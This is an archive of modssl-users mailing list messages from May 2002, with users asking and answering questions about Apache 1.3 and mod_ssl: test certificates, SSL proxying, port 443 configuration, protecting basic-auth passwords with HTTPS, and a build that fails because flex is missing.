Received: (qmail 96078 invoked by uid 908); 20 May 2002 00:37:44 -0000
Date: Sun, 19 May 2002 20:37:44 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Re: make certificate TYPE=custom?
Message-ID: <20020519203744.A95856@sidehack.sat.gweep.net>
References: <3CE3D592.3010006@itaction.co.uk> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: ; from jwoolley@apache.org on Thu, May 16, 2002 at 12:29:58PM -0400
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once upon a time Cliff Woolley shaped the electrons to say...
> IIRC, the official consensus on the httpd dev list was that will NOT
> support make certificate in Apache 2.x at all, with the reasoning that

That's incredibly lame.

> test certificates just tend to confuse people who don't know what they're
> doing.  Granted, there is a documentation bug which still indicates that

So it penalizes people who know what they are doing by making things
more difficult...

> I'm not saying I personally agree with the dropping of make certificate,
> but it was the group's decision, not mine.  And I suppose I see the

Caving in to ignorance is rarely a good decision.

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 15:12:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA13089; Mon, 20 May 2002 15:11:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vasco.com id PAA13041; Mon, 20 May 2002 15:10:21 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Mon, 20 May 2002 15:07:03 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 20 May 2002 13:10:19 UT
Date: Mon, 20 May 2002 09:11:59 -0400
MIME-Version: 1.0
Subject: Re: ssl proxy
Message-ID: <3CE8BDDF.31971.1456477D@localhost>
References: 
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 20 May 2002 13:07:04.0071 (UTC) FILETIME=[3C8D2170:01C1FFFF]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> > Can a httpd be set up as a "secure proxy"?  Ie.: forward requests
> > from a client  (a client that doesn't get involved with any ssl
> > stuff itself)  on to an HTTPS site?
> 
> Yes.  With Apache 1.3 / mod_ssl 2.8.x, you _might_ have to enable
> SSL_EXPERIMENTAL or something like that, I'm not sure.  But it can be
> done.
No special compile flags are necessary in 1.3.22+ and mod_ssl 2.8
Aryeh

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 18:30:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA25623; Mon, 20 May 2002 18:29:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from flashmail.com id SAA25568; Mon, 20 May 2002 18:28:35 +0200 (MET DST)
Received: (qmail 13352 invoked from network); 20 May 2002 16:27:01 -0000
Received: from unknown (HELO flashmail.com) (80.34.84.165)
  by 0 with SMTP; 20 May 2002 16:27:01 -0000
Message-ID: <3CE922FE.3FABABF1@flashmail.com>
Date: Mon, 20 May 2002 18:23:26 +0200
From: Pako <_pako_@flashmail.com>
Organization: APTICE
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.7-10 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: https in Apache1.3
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Pako <_pako_@flashmail.com>
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Nay Mooly wrote:

> Hello
>
> I installed  Apache1.3.20 and mod_ssl-2.8.4-1.3.20 and openssl-0.9.6c.
> I try http://IP address ,and success.
> But I try https://IP address ,I get error message (cannot indicate).
> I use
>
> #cd openssl-0.9.6c
> #./config -fPIC
> #make
>
> #cd mod_ssl-2.8.4-1.3.20
> #./configure --with-apache=../apache1.3.20 --with-ssl=../openssl-0.9.6c \
> --enable-shared=ssl
>
> #cd apache_1.3.20
> #make
> #make certificate TYPE=custom
>
> ----input data---------
>
> #make install
> #/usr/local/apache/bin/apachectl start
> #/usr/local/apache/bin/apachectl startssl
>
> -----enter pass phrase-----------
>
>      (httpd started)
>
> Then http:// is OK ,but retry https://  failed.
>
> I will thank you very much,if you give me some solutions.
>
> Thanks
>
> _________________________________________________________________
> Join the world?s largest e-mail service with MSN Hotmail.
> http://www.hotmail.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

Hello Mooly did you have an open port at 443, if yes it ok if not, probably
the httpd.conf file of your apache web server is not correct try to set it
to port 443
#netstat -an |more
will tell you wich ports are open in your computer.
The config may look like this

Listen 80
Listen 443

Probably this don't help you but, once you had installed and runned your
apache, the problem may probably be in your configuration, not in your
instalation, take a look at the logs
        Pako.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 18:48:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26656; Mon, 20 May 2002 18:47:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from xcgmd811.northgrum.com id SAA26609; Mon, 20 May 2002 18:46:36 +0200 (MET DST)
Received: by xcgmd811.northgrum.com with Internet Mail Service (5.5.2655.55)
	id ; Mon, 20 May 2002 09:48:29 -0700
Message-ID: 
From: "Potts, Ross A." 
To: "'modssl-users@modssl.org'" 
Subject: Password protected access
Date: Mon, 20 May 2002 09:46:17 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Potts, Ross A." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is there a way to encrypt the login window That I get when I want to reach
restricted areas?  I have the password file setup and can log in, but I
understand that the password is sent in plaintext.  I didn't see much in the
way of documentation about this.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 18:56:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA27147; Mon, 20 May 2002 18:55:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sch1p297.cna.com id SAA27129; Mon, 20 May 2002 18:55:14 +0200 (MET DST)
Received: from wch1xi04.cna.com (wch1xi04.cna.com [10.20.21.170])
	by sch1p297.cna.com (Switch-2.1.0/Switch-2.1.0) with SMTP id g4KGrVf05494
	for ; Mon, 20 May 2002 11:53:31 -0500 (CDT)
Received: from 10.20.23.108 by wch1xi04.cna.com (InterScan E-Mail VirusWall NT); Mon, 20 May 2002 11:54:09 -0500
Received: by wch1xi02.cna.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 20 May 2002 11:54:09 -0500
Message-ID: 
From: "Boex,Matthew W." 
To: modssl-users@modssl.org
Subject: httpd in single instance with mod_ssl
Date: Mon, 20 May 2002 11:54:09 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boex,Matthew W." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

how do i start up httpd in single instance with mod_ssl.  i can run this
fine using "apachectl startssl".  here is the error i am getting at my
feeble attempt...

[root@rootabega bin]# ./httpd -X -DSSL -d /usr/local/apache &
[1] 29274
[root@rootabega bin]# Apache/1.3.24 mod_ssl/2.8.8 (Pass Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide us with the pass phrases.

Server rootabega.fosbow.com:443 (RSA)

Apache:mod_ssl:Error: Private key not found.
**Stopped

matt
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 19:06:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA27733; Mon, 20 May 2002 19:05:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id TAA27667; Mon, 20 May 2002 19:04:02 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GWF62D00.NC0 for ; Mon, 20 May 2002
          18:03:49 +0100 
Message-ID: <3CE92C74.90303@itaction.co.uk>
Date: Mon, 20 May 2002 18:03:48 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Password protected access
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sure,

If you're going to use the default http auth mechanism, then use SSL.

if the URL is https:// something then it's all encrypted. (ok, unless
you do something really odd with the server config).

Note that the 'password window' is something your browser displays -
once it's got the password it will usually post that password in a
header in every  subsequent request to the same domain name.

If you're not planning on using SSL (one would then ask why you posted
the question to modssl-users....) then consider using mod_auth_digest.


Potts, Ross A. wrote:

>Is there a way to encrypt the login window That I get when I want to reach
>restricted areas?  I have the password file setup and can log in, but I
>understand that the password is sent in plaintext.  I didn't see much in the
>way of documentation about this.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 19:07:56 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA27790; Mon, 20 May 2002 19:06:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from d101.x-mailer.de id TAA27720; Mon, 20 May 2002 19:05:07 +0200 (MET DST)
Received: from [217.229.175.116] (helo=workstation.gietl.com)
	by d101.x-mailer.de with asmtp (TLSv1:RC4-MD5:128)
	(Exim 3.33 #3)
	id 179qaW-0001GO-00; Mon, 20 May 2002 19:04:48 +0200
Content-Type: text/plain;
  charset="iso-8859-1"
From: Andreas Gietl 
To: modssl-users@modssl.org, "Potts, Ross A." ,
        "'modssl-users@modssl.org'" 
Subject: Re: Password protected access
Date: Mon, 20 May 2002 19:02:00 +0200
User-Agent: KMail/1.4.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200205201902.00412.a.gietl@e-admin.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Gietl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Monday 20 May 2002 18:46, Potts, Ross A. wrote:

Hi Ross,

it isn't true it is sent plaintext. It is sent base64 encrypted, which is in 
case of security just as insecure as plaintext.

But if you connect to the host containing the password-realm via ssl/https 
your password is encrypted just the same way any other data would be 
encrypted with ssl. 

andreas

> Is there a way to encrypt the login window That I get when I want to reach
> restricted areas?  I have the password file setup and can log in, but I
> understand that the password is sent in plaintext.  I didn't see much in
> the way of documentation about this.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
e-admin internet gmbh
Andreas Gietl
Ludwig-Thoma-Strasse 35
93051 Regensburg
tel +49 941 3810884
fax +49 941 3810891
mobil +49 171 6070008

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 19:29:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA29368; Mon, 20 May 2002 19:28:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from xcgmd811.northgrum.com id TAA29347; Mon, 20 May 2002 19:27:58 +0200 (MET DST)
Received: by xcgmd811.northgrum.com with Internet Mail Service (5.5.2655.55)
	id ; Mon, 20 May 2002 10:29:44 -0700
Message-ID: 
From: "Potts, Ross A." 
To: "'modssl-users@modssl.org'" 
Subject: RE: Password protected access
Date: Mon, 20 May 2002 10:27:33 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Potts, Ross A." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Actually, I am planning on having a fully https:// site.  But, I still want
to restrict certain reports directories.  So, let me see if I understand...
Once I am connected via SSL, then the password sent (after getting the lock
icon on the bottom) will also be encrypted?

-----Original Message-----
From: Peter Viertel [mailto:peter.viertel@itaction.co.uk]
Sent: Monday, May 20, 2002 1:04 PM
To: modssl-users@modssl.org
Subject: Re: Password protected access


Sure,

If you're going to use the default http auth mechanism, then use SSL.

if the URL is https:// something then it's all encrypted. (ok, unless
you do something really odd with the server config).

Note that the 'password window' is something your browser displays -
once it's got the password it will usually post that password in a
header in every  subsequent request to the same domain name.

If you're not planning on using SSL (one would then ask why you posted
the question to modssl-users....) then consider using mod_auth_digest.


Potts, Ross A. wrote:

>Is there a way to encrypt the login window That I get when I want to reach
>restricted areas?  I have the password file setup and can log in, but I
>understand that the password is sent in plaintext.  I didn't see much in
the
>way of documentation about this.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 19:44:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA00248; Mon, 20 May 2002 19:43:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from d101.x-mailer.de id TAA00203; Mon, 20 May 2002 19:42:17 +0200 (MET DST)
Received: from [217.229.175.116] (helo=workstation.gietl.com)
	by d101.x-mailer.de with asmtp (TLSv1:RC4-MD5:128)
	(Exim 3.33 #3)
	id 179rAl-0006IW-00; Mon, 20 May 2002 19:42:16 +0200
Content-Type: text/plain;
  charset="iso-8859-1"
From: Andreas Gietl 
To: modssl-users@modssl.org, "Potts, Ross A." ,
        "'modssl-users@modssl.org'" 
Subject: Re: Password protected access
Date: Mon, 20 May 2002 19:39:33 +0200
User-Agent: KMail/1.4.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200205201939.33522.a.gietl@e-admin.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Gietl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Monday 20 May 2002 19:27, Potts, Ross A. wrote:

that's right.

> Actually, I am planning on having a fully https:// site.  But, I still want
> to restrict certain reports directories.  So, let me see if I understand...
> Once I am connected via SSL, then the password sent (after getting the lock
> icon on the bottom) will also be encrypted?
>
> -----Original Message-----
> From: Peter Viertel [mailto:peter.viertel@itaction.co.uk]
> Sent: Monday, May 20, 2002 1:04 PM
> To: modssl-users@modssl.org
> Subject: Re: Password protected access
>
>
> Sure,
>
> If you're going to use the default http auth mechanism, then use SSL.
>
> if the URL is https:// something then it's all encrypted. (ok, unless
> you do something really odd with the server config).
>
> Note that the 'password window' is something your browser displays -
> once it's got the password it will usually post that password in a
> header in every  subsequent request to the same domain name.
>
> If you're not planning on using SSL (one would then ask why you posted
> the question to modssl-users....) then consider using mod_auth_digest.
>
> Potts, Ross A. wrote:
> >Is there a way to encrypt the login window That I get when I want to reach
> >restricted areas?  I have the password file setup and can log in, but I
> >understand that the password is sent in plaintext.  I didn't see much in
>
> the
>
> >way of documentation about this.
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
e-admin internet gmbh
Andreas Gietl
Ludwig-Thoma-Strasse 35
93051 Regensburg
tel +49 941 3810884
fax +49 941 3810891
mobil +49 171 6070008

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 21:57:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA08208; Mon, 20 May 2002 21:56:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from AEX01.anchieta.local id VAA08159; Mon, 20 May 2002 21:55:58 +0200 (MET DST)
Subject:  Welcome to modssl-users
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
content-class: urn:content-classes:message
Date: Mon, 20 May 2002 16:56:20 -0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
Message-ID: 
Thread-Topic: Welcome to modssl-users
Thread-Index: AcIAN6SVH/X9aoOSQMiPcQTb15GEnAAADQeg
From: "Angelo Marcos Rigo" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA08166
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Angelo Marcos Rigo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi i am new to the list

And on using ssl too
I have linux with openssl installed and apache webserver
i have two forms on my website that are stored on two differents
databases
i would like these forms would be transmited in a secure way (https?)

can anybody give some newbie´s steps to setup a secure conection?
i am just reading the manuals by now, would be great if i have a big
picture of how to do that!

Thank´s
Ângelo Marcos Rigo
Webmaster Colégio Anchieta
angelo@colegioanchieta.g12.br
Visite nosso site www.colegioanchieta.g12.br

> ----- Mensagem original -----
> De:		majordomo@modssl.org [SMTP:majordomo@modssl.org]
> Enviada em:		segunda-feira, 20 de maio de 2002 16:50
> Para:		Angelo Marcos Rigo
> Assunto:		Welcome to modssl-users
> 
> --
> 
> Welcome to the modssl-users mailing list!
> 
> Please save this message for future reference.  Thank you.
> 
> If you ever want to remove yourself from this mailing list,
> you can send mail to  with the following
> command in the body of your email message:
> 
>     unsubscribe modssl-users
> 
> or from another account, besides angelo@colegioanchieta.g12.br:
> 
>     unsubscribe modssl-users angelo@colegioanchieta.g12.br
> 
> If you ever need to get in contact with the owner of the list,
> (if you have trouble unsubscribing, or have questions about the
> list itself) send email to  .
> This is the general rule for most mailing lists when you need
> to contact a human.
> 
>  Here's the general information for the list you've subscribed to,
>  in case you don't already have it:
> 
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 22:25:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA10212; Mon, 20 May 2002 22:24:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id WAA10174; Mon, 20 May 2002 22:23:34 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 20 May 2002 16:24:20 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: make fails - no flex
Date: Mon, 20 May 2002 16:24:18 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


My apache make fails with:
Error: Cannot load flex.

I never heard of flex.  Is this just a fancy lex?  Can i substitute lex for
flex in the makefile?  I'm on HPUX11.0.
Else can i download flex from somewhere?

Also the spot in the makefile where flex is called is referred to in comment
as "Developer Area" - does this mean i can just comment it all out?

-george
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 22:40:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA11065; Mon, 20 May 2002 22:39:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id WAA11023; Mon, 20 May 2002 22:38:29 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4KKbDm14691
	for ; Mon, 20 May 2002 16:37:13 -0400
Date: Mon, 20 May 2002 16:37:13 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: "'modssl-users@modssl.org'" 
Subject: Re: make fails - no flex
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 20 May 2002, Petryczka, George wrote:

> My apache make fails with:
> Error: Cannot load flex.
>
> I never heard of flex.  Is this just a fancy lex?  Can i substitute lex for

> flex in the makefile?  I'm on HPUX11.0.
> Else can i download flex from somewhere?

fast lex.  It's GNU's lex.  But you shouldn't need it.  In the mod_ssl
build directory, do the following:

touch ssl_expr_parse.c
touch ssl_expr_parse.h
touch ssl_expr_scan.h

And then it shouldn't try to use flex anymore.  What version of
mod_ssl and Apache is this, by the way?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 23:14:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA13611; Mon, 20 May 2002 23:13:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id XAA13487; Mon, 20 May 2002 23:12:55 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 20 May 2002 17:13:41 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: RE: make fails - no flex
Date: Mon, 20 May 2002 17:13:35 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Cliff,
This was attempted with mod_ssl 2.8.8-1.3.24 and apache 1.3.24.  

Won't touching those files cause some component not to be built?
And thanks.
-george


-----Original Message-----
From: Cliff Woolley [mailto:jwoolley@apache.org]
Sent: Monday, May 20, 2002 4:37 PM
To: 'modssl-users@modssl.org'
Subject: Re: make fails - no flex


On Mon, 20 May 2002, Petryczka, George wrote:

> My apache make fails with:
> Error: Cannot load flex.
>
> I never heard of flex.  Is this just a fancy lex?  Can i substitute lex
for

> flex in the makefile?  I'm on HPUX11.0.
> Else can i download flex from somewhere?

fast lex.  It's GNU's lex.  But you shouldn't need it.  In the mod_ssl
build directory, do the following:

touch ssl_expr_parse.c
touch ssl_expr_parse.h
touch ssl_expr_scan.h

And then it shouldn't try to use flex anymore.  What version of
mod_ssl and Apache is this, by the way?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 23:19:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA13997; Mon, 20 May 2002 23:18:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id XAA13974; Mon, 20 May 2002 23:17:54 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 20 May 2002 17:18:41 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: RE: make fails - no flex
Date: Mon, 20 May 2002 17:18:34 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Actually i just tried touching the three files and i still get that same
error.  I'll try downloading a flex if i can find it.  Would lex work
though?

-----Original Message-----
From: Petryczka, George [mailto:george@smartserv.com]
Sent: Monday, May 20, 2002 5:14 PM
To: 'modssl-users@modssl.org'
Subject: RE: make fails - no flex


Cliff,
This was attempted with mod_ssl 2.8.8-1.3.24 and apache 1.3.24.  

Won't touching those files cause some component not to be built?
And thanks.
-george


-----Original Message-----
From: Cliff Woolley [mailto:jwoolley@apache.org]
Sent: Monday, May 20, 2002 4:37 PM
To: 'modssl-users@modssl.org'
Subject: Re: make fails - no flex


On Mon, 20 May 2002, Petryczka, George wrote:

> My apache make fails with:
> Error: Cannot load flex.
>
> I never heard of flex.  Is this just a fancy lex?  Can i substitute lex
for

> flex in the makefile?  I'm on HPUX11.0.
> Else can i download flex from somewhere?

fast lex.  It's GNU's lex.  But you shouldn't need it.  In the mod_ssl
build directory, do the following:

touch ssl_expr_parse.c
touch ssl_expr_parse.h
touch ssl_expr_scan.h

And then it shouldn't try to use flex anymore.  What version of
mod_ssl and Apache is this, by the way?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

